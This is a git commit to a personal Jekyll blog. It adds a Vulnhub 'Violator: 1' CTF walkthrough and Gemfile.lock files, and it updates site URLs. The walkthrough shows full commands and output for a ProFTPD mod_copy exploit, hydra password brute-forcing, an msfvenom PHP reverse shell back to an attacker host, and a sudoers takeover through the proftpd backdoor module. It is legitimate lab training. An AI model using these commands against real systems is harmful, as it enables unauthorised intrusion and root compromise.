violator walkthrough

2016-07-10 03:19:59 -04:00 · 2016-07-10 03:19:59 -04:00 · da19f0fdea
parent 27aeb4b8e7
commit da19f0fdea
14 changed files with 1389 additions and 243 deletions
--- a/Gemfile.lock
+++ b/Gemfile.lock
@ -0,0 +1,74 @@
 GEM
  remote: https://ruby.taobao.org/
  specs:
    celluloid (0.16.0)
      timers (~> 4.0.0)
    chunky_png (1.3.6)
    colorator (0.1)
    compass (1.0.3)
      chunky_png (~> 1.2)
      compass-core (~> 1.0.2)
      compass-import-once (~> 1.0.5)
      rb-fsevent (>= 0.9.3)
      rb-inotify (>= 0.9)
      sass (>= 3.3.13, < 3.5)
    compass-core (1.0.3)
      multi_json (~> 1.0)
      sass (>= 3.3.0, < 3.5)
    compass-import-once (1.0.5)
      sass (>= 3.2, < 3.5)
    ffi (1.9.13)
    hitimes (1.2.4)
    jekyll (3.1.6)
      colorator (~> 0.1)
      jekyll-sass-converter (~> 1.0)
      jekyll-watch (~> 1.1)
      kramdown (~> 1.3)
      liquid (~> 3.0)
      mercenary (~> 0.3.3)
      rouge (~> 1.7)
      safe_yaml (~> 1.0)
    jekyll-paginate (1.1.0)
    jekyll-sass-converter (1.4.0)
      sass (~> 3.4)
    jekyll-watch (1.2.1)
      listen (~> 2.7)
    json (2.0.1)
    kramdown (1.11.1)
    liquid (3.0.6)
    listen (2.10.1)
      celluloid (~> 0.16.0)
      rb-fsevent (>= 0.9.3)
      rb-inotify (>= 0.9)
    mercenary (0.3.6)
    multi_json (1.12.1)
    posix-spawn (0.3.11)
    pygments.rb (0.6.3)
      posix-spawn (~> 0.3.6)
      yajl-ruby (~> 1.2.0)
    rb-fsevent (0.9.7)
    rb-inotify (0.9.7)
      ffi (>= 0.5.0)
    redcarpet (3.2.3)
    rouge (1.11.1)
    safe_yaml (1.0.4)
    sass (3.4.22)
    timers (4.0.4)
      hitimes
    yajl-ruby (1.2.1)
 PLATFORMS
  ruby
 DEPENDENCIES
  compass
  jekyll
  jekyll-paginate
  jekyll-watch (~> 1.2.1)
  json
  kramdown
  pygments.rb
  redcarpet (~> 3.2.3)
 BUNDLED WITH
   1.12.5
--- a/_posts/2016-07-08-violator_walkthrough.md
+++ b/_posts/2016-07-08-violator_walkthrough.md
@ -0,0 +1,350 @@
 ---
 title: "Violator: 1, Vulnhub Walkthrough"
 layout: post
 category: writeup
 tags: [vulnhub, hacking]
 excerpt: "Walkthrough for Violator: 1 VM on Vulnhub"
 ---
 Before I begin, here's some hints given at the start of the vm:
 - Vince Clarke can help you with the Fast Fashion.
 - The challenge isn’t over with root. The flag is something special.
 - I have put a few trolls in, but only to sport with you.
 # Get the IP and check for services
 ```
 paul@archyoga [04:21:07] [~]
 -> % nmap -sn 192.168.1.0/24 | grep violator
 Nmap scan report for violator (192.168.1.108)
 paul@archyoga [04:21:36] [~]
 -> % nmap -p- -sV 192.168.1.108
 Starting Nmap 7.12 ( https://nmap.org ) at 2016-07-09 16:21 EDT
 Nmap scan report for violator (192.168.1.108)
 Host is up (0.0086s latency).
 Not shown: 65533 closed ports
 PORT   STATE SERVICE VERSION
 21/tcp open  ftp     ProFTPD 1.3.5rc3
 80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
 Service Info: OS: Unix
 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 23.49 seconds
 ```
 So there's a website and an proFTPD v1.3.5rc3 server running on the machine. The website just says "I Say.. I say... I say boy! You're barkin up the wrong tree!" along with Foghorn Leghorn.
 However, in the source I found this: ```<-- https://en.wikipedia.org/wiki/Violator_(album) -->```
 I found an exploit through [http://exploit-db.com](http://exploit-db.com) for proFTPD 1.3.5 (CVE: 2015-3306) that allows you to copy files without logging into the server:
 I wasn't sure what to copy, so I just copied anything I could by copying ```/proc/self/root``` to ```/var/www/html/root```, this making everything except the root user directory accessible:
 ```
 paul@archyoga [04:49:25] [~]
 -> % ftp 192.168.1.108
 Connected to 192.168.1.108.
 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
 Name (192.168.1.108:paul):
 331 Password required for paul
 Password:
 530 Login incorrect.
 ftp: Login failed.
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> site cpfr /proc/self/root
 350 File or directory exists, ready for destination name
 ftp> site cpto /var/www/html/root
 250 Copy successful
 ftp>
 ```
 Now you can easily see ```/etc/passwd```, all the home directories, and ```/etc/group``` to determine what to do next.
 ```
 dg:x:1000:1000:Dave Gahan,,,:/home/dg:/bin/bash
 proftpd:x:104:65534::/var/run/proftpd:/bin/false
 ftp:x:105:65534::/srv/ftp:/bin/false
 mg:x:1001:1001:Martin Gore:/home/mg:/bin/bash
 af:x:1002:1002:Andrew Fletcher:/home/af:/bin/bash
 aw:x:1003:1003:Alan Wilder:/home/aw:/bin/bash
 ```
 Notice ```dg, mg, af, and aw```, who are all members of Depeche Mode, which was referenced in an initial hint. I spent quite some time traversing their home directories, however I didn't have enough information to do anything yet. I found instructions for a Wermache enigma machine and some other hints, but I still needed key. I'll come back to this part in more detail later.
 # Get access to the server
 In ```/etc/group```, I can see that user ```dg``` is a member of several groups, so let's try to crack that password:
 The only possible solution I have for this is the link to the album for Violator.
 ```
 paul@archyoga [06:13:59] [~]
 -> % cewl "https://en.wikipedia.org/wiki/Violator_(album)" -m 6 -w passwords.txt
 CeWL 5.1 Robin Wood (robin@digi.ninja) (http://digi.ninja)
 paul@archyoga [06:23:38] [~]
 -> % tr '[:upper:]' '[:lower:]' < passwords.txt > passwords1.txt
 paul@archyoga [06:23:40] [~]
 -> % sed -i "s/ //g" passwords1.txt
 paul@archyoga [06:23:42] [~]
 -> % hydra -t 1 -l dg -P ./passwords1.txt -vV 192.168.1.108 ftp
 Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 ...
 [21][ftp] host: 192.168.1.108 login: dg password: policyoftruth
 [STATUS] attack finished for 192.168.1.108 (valid pair found)
 1 of 1 target successfully completed, 1 valid password found
 ```
 First I used cewl to generate a password list based on the given url, then removed all the spaces and converted everything to lowercase using ```tr``` and ```sed```.
 Now that I can actually create new files in the server, I generated a reverse php shell and used metasploit to get a shell on the machine:
 ```
 paul@archyoga [11:03:11] [~]
 -> % msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=1337 R > exploit.php
 fatal: Not a git repository (or any of the parent directories): .git
 No platform was selected, choosing Msf::Module::Platform::PHP from the payload
 No Arch selected, selecting Arch: php from the payload
 No encoder or badchars specified, outputting raw payload
 Payload size: 949 bytes
 paul@archyoga [11:03:15] [~]
 -> % ftp 192.168.1.108                                                                     
 Connected to 192.168.1.108.
 220 ProFTPD 1.3.5rc3 Server (Debian) [::ffff:192.168.1.108]
 Name (192.168.1.108:paul): dg
 331 Password required for dg
 Password:
 230 User dg logged in
 Remote system type is UNIX.
 Using binary mode to transfer files.
 ftp> cd /var/www/html/
 250 CWD command successful
 ftp> put exploit.php
 200 PORT command successful
 150 Opening BINARY mode data connection for exploit.php
 226 Transfer complete
 949 bytes sent in 6.8e-05 seconds (13.3 Mbytes/s)
 ftp> 221 Goodbye.
 paul@archyoga [11:04:14] [~]
 -> % msfconsole
 ...
 msf > use exploit/multi/handler
 msf exploit(handler) > set lhost 192.168.1.109
 lhost => 192.168.1.109
 msf exploit(handler) > set lport 1337
 lport => 1337
 msf exploit(handler) > set payload php/meterpreter/reverse_tcp
 payload => php/meterpreter/reverse_tcp
 msf exploit(handler) > exploit
 [*] Started reverse TCP handler on 192.168.1.109:1337
 [*] Starting the payload handler...
 [*] Sending stage (33721 bytes) to 192.168.1.108
 [*] Meterpreter session 1 opened (192.168.1.109:1337 -> 192.168.1.108:43369) at 2016-07-09 23:05:11 -0400
 meterpreter > shell
 Process 1314 created.
 Channel 1 created.
 python -c 'import pty;pty.spawn("/bin/sh")'
 $ su dg
 su dg
 Password: policyoftruth
 dg@violator:/var/www/html$
 ```
 If you don't have much experience with metasploit (especially reverse shells), you should probably research that to get used to it.
 # Getting Root
 Now, back to the home directories, if you go to ```http://192.168.1.108/root/home``` there's 4 directories for each of the 4 suspicious users we saw earlier: ```af, aw, dg, mg```. The directory for af contains minarke, a terminal based enigma emulator, which is suprisingly difficult to use, aw contains a hint reading ```You are getting close... Can you crack the final enigma..?Y```, mg contains instructions for a Wermacht enigma machine, and dg contains a very small filesystem with proftpd isntalled.
 Running ```sudo -l``` shows that user ```dg``` has permissions to run proftpd in this directory, however it only allows connections from 127.0.0.1. Once I ran it, I found out it is proftpd 1.3.3c.
 ```
 dg@violator:/var/www/html$ sudo -l
 sudo -l
 Matching Defaults entries for dg on violator:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
 User dg may run the following commands on violator:
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
 dg@violator:~/bd/sbin$ sudo /home/dg/bd/sbin/proftpd
 sudo /home/dg/bd/sbin/proftpd
 - setting default address to 127.0.0.1
 localhost - SocketBindTight in effect, ignoring DefaultServer
 dg@violator:/var/www/html$ ftp localhost 2121
 ftp localhost 2121
 ftp: connect to address ::1: Connection refused
 Trying 127.0.0.1...
 Connected to localhost.
 220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
 ```
 Then I added a port forward through metasploit so I could access it on my local machine:
 ```
 dg@violator:/var/www/html$ ^C
 Terminate channel 0? [y/N]  N
 [-] core_channel_interact: Operation failed: 1
 meterpreter > portfwd add -L 127.0.0.1 -l 2121 -p 2121 -r 127.0.0.1
 [*] Local TCP relay created: 127.0.0.1:2121 <-> 127.0.0.1:2121
 meterpreter >
 ```
 Now you can access the internal proftpd server v1.3.3c from your machine:
 ```
 paul@archyoga [01:45:03] [~]
 -> % telnet 127.0.0.1 2121
 Trying 127.0.0.1...
 Connected to 127.0.0.1.
 Escape character is '^]'.
 220 ProFTPD 1.3.3c Server (Depeche Mode Violator Server) [127.0.0.1]
 user dg
 331 Password required for dg
 pass policyoftruth
 230 User dg logged in
 ```
 Now that I have metasploit port forwarding the ftp connection and I'm connected to it, I can use the exploit in proftpd 1.3.3c [https://www.exploit-db.com/exploits/15662/](https://www.exploit-db.com/exploits/15662/) with the metasploit module ```exploit/unix/ftp/proftpd_133c_backdoor``` along with the payload ```/cmd/unix/generic```
 First in the using the shell I wrote ```dg ALL=(ALL:ALL)  ALL``` to ```/tmp/exploit``` since I'm using that to get root. Then I used the proftpd v1.3.3c exploit to actually copy it to the right directory:
 ```
 msf > use exploit/unix/ftp/proftpd_133c_backdoor
 msf exploit(proftpd_133c_backdoor) > set rhost 127.0.0.1
 rhost => 127.0.0.1
 msf exploit(proftpd_133c_backdoor) > set rport 2121
 rport => 2121
 msf exploit(proftpd_133c_backdoor) > set payload cmd/unix/generic
 payload => cmd/unix/generic
 msf exploit(proftpd_133c_backdoor) > set cmd chmod 0440 /tmp/exploit && cp /tmp/exploit /etc/sudoers.d
 cmd => chmod 0440 /tmp/exploit && cp /tmp/exploit /etc/sudoers.d
 msf exploit(proftpd_133c_backdoor) > exploit
 [*] 127.0.0.1:2121 - Sending Backdoor Command
 [*] Exploit completed, but no session was created.
 ```
 ```
 dg@violator:/var/www/html$ sudo -l
 ...
 User dg may run the following commands on violator:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /home/dg/bd/sbin/proftpd
 dg@violator:/var/www/html$ sudo su
 sudo su
 [sudo] password for dg: policyoftruth
 root@violator:/var/www/html# cd /root
 cd /root
 root@violator:~# ls
 ls
 flag.txt
 root@violator:~# cat flag.txt
 cat flag.txt
 I say... I say... I say boy! Pumping for oil or something...?
 ---Foghorn Leghorn "A Broken Leghorn" 1950 (C) W.B.
 ```
 And that get's us the flag! Now for the <i>final enigma</i>.
 # The Final Enigma
 Within the root folder there's also a suspicious directory ```.basildon``` containing ```crocs.rar```
 ```
 root@violator:~# ls -a
 ls -a
 .  ..  .bash_history  .bashrc  .basildon  flag.txt  .profile
 root@violator:~# cd .basildon
 cd .basildon
 root@violator:~/.basildon# ls -a
 ls -a
 .  ..  crocs.rar
 root@violator:~/.basildon# cp crocs.rar /var/www/html/
 cp crocs.rar /var/www/html/
 ```
 Back on my local machine, I can see the contents of crocs.rar are password protected
 ```
 paul@archyoga [02:17:20] [~/Downloads]
 -> % unrar e crocs.rar
 ...
 Enter password (will not be echoed) for artwork.jpg:
 ```
 I tried using the password list from eariler, but that didn't work so I did some googling about crocs and Depeche Mode and found out it is a night club they play at, so I added songs from that to the list and tried it again, and that didn't work either. I wasn't sure what else to try, so I regenerated the password list except didn't take any spaces out or change anything to lowercase, and sure enough it worked!
 ```
 paul@archyoga [02:21:49] [~/Downloads]
 -> % rar2john crocs.rar > myhash
 paul@archyoga [02:25:11] [~/Downloads]
 -> % rar2john myhash --wordlist=~/passwords4.txt   
 Using default input encoding: UTF-8
 Loaded 1 password hash (rar, RAR3 [SHA1 AES 32/64])
 Press 'q' or Ctrl-C to abort, almost any other key for status
 World in My Eyes (crocs.rar)
 ```
 Inside ```crocs.rar``` there's just some album artwork, but running exiftool on it reveals a very suspicoius copyright and rights message:
 ```
 UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQ
 LTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWK
 LSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUW
 ISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJM
 FVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLO
 ZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDV
 KFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGP
 FBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIA
 TOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHV
 CRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMW
 RHJEMUSGYBGWXJENRZHZ
 ```
 I'm guessing this is the key for the enigma referenced in the home directories earlier.
 Using the instructions from the ```mg``` home folder I decrypted the code using [http://www.dcode.fr/enigma-machine-cipher](http://www.dcode.fr/enigma-machine-cipher) since the given minarke emulator was confusing to use.
 ```
 Lyrics:
 * Use Wermacht with 3 rotors
 * Reflector to B
 Initial: A B C
 Alphabet Ring: C B A
 Plug Board A-B, C-D
 ```
 <br>
 ```
 ONE FINAL CHALLENGE FOR YOU BGHX CONGRATULATIONS FOR
 THE FOURTH TIME ON SNARFING THE FLAG ON VIOLATOR ILL
 PRESUME BY NOW YOULL KNOW WHAT I WAS LISTENING TO WHEN
 CREATING THIS CTF I HAVE INCLUDED THINGS WHICH WERE
 DELIBERATLY AVOIDING THE OBVIOUS ROUTE IN TO KEEP YOU ON
 YOUR TOES ANOTHER THOUGHT TO PONDER IS THAT BY ABUSING
 PERMISSIONS YOU ARE ALSO BY DEFINITION A VIOLATOR
 SHOUTOUTS AGAIN TO VULNHUB FOR HOSTING A GREAT LEARNING
 TOOL A SPECIAL THANKS GOES TO BENR AND GKNSB FOR TESTING
 AND TO GTMLK FOR THE OFFER TO HOST THE CTF AGAIN
 ```
 There you go!
--- a/_site/404.html
+++ b/_site/404.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,36 +28,35 @@
 <title>Paul Walko</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
 </head>
@ -78,16 +77,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -120,7 +119,7 @@
 <div id="whoops">
    <h1>Whoops! 404</h1>
-    <h2>I suggest you <a href="http://localhost:4000/"> go sweet <i class="fa fa-home"></i></a></h2>
+    <h2>I suggest you <a href="https://paul.walko.org/"> go sweet <i class="fa fa-home"></i></a></h2>
 </div>
        </div>
    </section>
@ -151,7 +150,7 @@
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
 </body>
 </html>
--- a/_site/Gemfile.lock
+++ b/_site/Gemfile.lock
@ -0,0 +1,74 @@
 GEM
  remote: https://ruby.taobao.org/
  specs:
    celluloid (0.16.0)
      timers (~> 4.0.0)
    chunky_png (1.3.6)
    colorator (0.1)
    compass (1.0.3)
      chunky_png (~> 1.2)
      compass-core (~> 1.0.2)
      compass-import-once (~> 1.0.5)
      rb-fsevent (>= 0.9.3)
      rb-inotify (>= 0.9)
      sass (>= 3.3.13, < 3.5)
    compass-core (1.0.3)
      multi_json (~> 1.0)
      sass (>= 3.3.0, < 3.5)
    compass-import-once (1.0.5)
      sass (>= 3.2, < 3.5)
    ffi (1.9.13)
    hitimes (1.2.4)
    jekyll (3.1.6)
      colorator (~> 0.1)
      jekyll-sass-converter (~> 1.0)
      jekyll-watch (~> 1.1)
      kramdown (~> 1.3)
      liquid (~> 3.0)
      mercenary (~> 0.3.3)
      rouge (~> 1.7)
      safe_yaml (~> 1.0)
    jekyll-paginate (1.1.0)
    jekyll-sass-converter (1.4.0)
      sass (~> 3.4)
    jekyll-watch (1.2.1)
      listen (~> 2.7)
    json (2.0.1)
    kramdown (1.11.1)
    liquid (3.0.6)
    listen (2.10.1)
      celluloid (~> 0.16.0)
      rb-fsevent (>= 0.9.3)
      rb-inotify (>= 0.9)
    mercenary (0.3.6)
    multi_json (1.12.1)
    posix-spawn (0.3.11)
    pygments.rb (0.6.3)
      posix-spawn (~> 0.3.6)
      yajl-ruby (~> 1.2.0)
    rb-fsevent (0.9.7)
    rb-inotify (0.9.7)
      ffi (>= 0.5.0)
    redcarpet (3.2.3)
    rouge (1.11.1)
    safe_yaml (1.0.4)
    sass (3.4.22)
    timers (4.0.4)
      hitimes
    yajl-ruby (1.2.1)
 PLATFORMS
  ruby
 DEPENDENCIES
  compass
  jekyll
  jekyll-paginate
  jekyll-watch (~> 1.2.1)
  json
  kramdown
  pygments.rb
  redcarpet (~> 3.2.3)
 BUNDLED WITH
   1.12.5
--- a/_site/about/index.html
+++ b/_site/about/index.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,36 +28,35 @@
 <title>Paul Walko</title>
 <!-- favicon -->
-<link rel="apple-touch-icon" sizes="57x57" href="http://localhost:4000/favicon/apple-icon-57x57.png">
+<link rel="apple-touch-icon" sizes="57x57" href="https://paul.walko.org/favicon/apple-icon-57x57.png">
-<link rel="apple-touch-icon" sizes="60x60" href="http://localhost:4000/favicon/apple-icon-60x60.png">
+<link rel="apple-touch-icon" sizes="60x60" href="https://paul.walko.org/favicon/apple-icon-60x60.png">
-<link rel="apple-touch-icon" sizes="72x72" href="http://localhost:4000/favicon/apple-icon-72x72.png">
+<link rel="apple-touch-icon" sizes="72x72" href="https://paul.walko.org/favicon/apple-icon-72x72.png">
-<link rel="apple-touch-icon" sizes="76x76" href="http://localhost:4000/favicon/apple-icon-76x76.png">
+<link rel="apple-touch-icon" sizes="76x76" href="https://paul.walko.org/favicon/apple-icon-76x76.png">
-<link rel="apple-touch-icon" sizes="114x114" href="http://localhost:4000/favicon/apple-icon-114x114.png">
+<link rel="apple-touch-icon" sizes="114x114" href="https://paul.walko.org/favicon/apple-icon-114x114.png">
-<link rel="apple-touch-icon" sizes="120x120" href="http://localhost:4000/favicon/apple-icon-120x120.png">
+<link rel="apple-touch-icon" sizes="120x120" href="https://paul.walko.org/favicon/apple-icon-120x120.png">
-<link rel="apple-touch-icon" sizes="144x144" href="http://localhost:4000/favicon/apple-icon-144x144.png">
+<link rel="apple-touch-icon" sizes="144x144" href="https://paul.walko.org/favicon/apple-icon-144x144.png">
-<link rel="apple-touch-icon" sizes="152x152" href="http://localhost:4000/favicon/apple-icon-152x152.png">
+<link rel="apple-touch-icon" sizes="152x152" href="https://paul.walko.org/favicon/apple-icon-152x152.png">
-<link rel="apple-touch-icon" sizes="180x180" href="http://localhost:4000/favicon/apple-icon-180x180.png">
+<link rel="apple-touch-icon" sizes="180x180" href="https://paul.walko.org/favicon/apple-icon-180x180.png">
-<link rel="icon" type="image/png" sizes="192x192"  href="http://localhost:4000/favicon/android-icon-192x192.png">
+<link rel="icon" type="image/png" sizes="192x192"  href="https://paul.walko.org/favicon/android-icon-192x192.png">
-<link rel="icon" type="image/png" sizes="32x32" href="http://localhost:4000/favicon/favicon-32x32.png">
+<link rel="icon" type="image/png" sizes="32x32" href="https://paul.walko.org/favicon/favicon-32x32.png">
-<link rel="icon" type="image/png" sizes="96x96" href="http://localhost:4000/favicon/favicon-96x96.png">
+<link rel="icon" type="image/png" sizes="96x96" href="https://paul.walko.org/favicon/favicon-96x96.png">
-<link rel="icon" type="image/png" sizes="16x16" href="http://localhost:4000/favicon/favicon-16x16.png">
+<link rel="icon" type="image/png" sizes="16x16" href="https://paul.walko.org/favicon/favicon-16x16.png">
-<link rel="manifest" href="http://localhost:4000/favicon/manifest.json">
+<link rel="manifest" href="https://paul.walko.org/favicon/manifest.json">
 <meta name="msapplication-TileColor" content="#ffffff">
 <meta name="msapplication-TileImage" content="/ms-icon-144x144.png">
 <meta name="theme-color" content="#ffffff">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/base.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/base.css">
-<link rel="stylesheet" type="text/css" href="http://localhost:4000/stylesheets/simplePagination.css">
+<link rel="stylesheet" type="text/css" href="https://paul.walko.org/stylesheets/simplePagination.css">
 <script type="text/javascript" src="https://paul.walko.org/javascripts/jquery.js"></script>
 <script type="text/javascript" src="http://localhost:4000/javascripts/jquery.js"></script>
 <!--
 <link rel="canonical" href=" { { site.url } }{ { page.url } }" />
 -->
 <!--[if lt IE 9]>
-<script src="http://localhost:4000/javascripts/html5shiv.js"></script>
+<script src="https://paul.walko.org/javascripts/html5shiv.js"></script>
 <![endif]-->
 </head>
@ -78,16 +77,16 @@
        <div class="row navbar">
            <nav class="col-lg-8 col-md-8 col-xs-12">
                <ul class="row">
-                    <li class="col-lg-3"><a href="http://localhost:4000/">HOME</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/">HOME</a></li>
                    <li class="col-lg-3">
                        <ul class="subnav">
                            <a href="javascript:void(0)">POSTS</a>
-                            <li><a href="http://localhost:4000/category">CATEGORY</a></li>
+                            <li><a href="https://paul.walko.org/category">CATEGORY</a></li>
-                            <li><a href="http://localhost:4000/tag">TAG</a></li>
+                            <li><a href="https://paul.walko.org/tag">TAG</a></li>
                        </ul>
                    </li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/about">ABOUT</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/about">ABOUT</a></li>
-                    <li class="col-lg-3"><a href="http://localhost:4000/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
+                    <li class="col-lg-3"><a href="https://paul.walko.org/Walko_Paul-Resume.pdf">RÉSUMÉ</a></li>
                </ul>
            </nav>
@ -121,7 +120,7 @@
 <div class="row" id="about">
    <header id="title">
-        <img src="http://localhost:4000//images/me.png">
+        <img src="https://paul.walko.org//images/me.png">
        <h1><small>Student at Virgina Tech</small></h1>
    </header>
@ -180,7 +179,7 @@
    <section id="action">
        <h2></small>Contact Me</small></h2>
-        <a href="http://localhost:4000/Walko_Paul-Resume.pdf">View my resume</a>
+        <a href="https://paul.walko.org/Walko_Paul-Resume.pdf">View my resume</a>
        <span> or </span>
        <a href="mailto:paulsw.pw@gmail.com">e-mail me</a>
    </section>
@ -216,7 +215,7 @@
    </div>
 </footer>
-<script type="text/javascript" src="http://localhost:4000/javascripts/base.js"></script>
+<script type="text/javascript" src="https://paul.walko.org/javascripts/base.js"></script>
 </body>
 </html>
--- a/_site/category/index.html
+++ b/_site/category/index.html
@ -5,12 +5,12 @@
 <html>
 <head>
    <meta charset="utf-8">
-<!--<script type="text/javascript">
+<script type="text/javascript">
    var host = "paul.walko.org";
    if ((host == window.location.host) && (window.location.protocol != "https:"))
        window.location.protocol = "https";
 </script>
-->
+
 <script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
@ -28,36 +28,35 @@
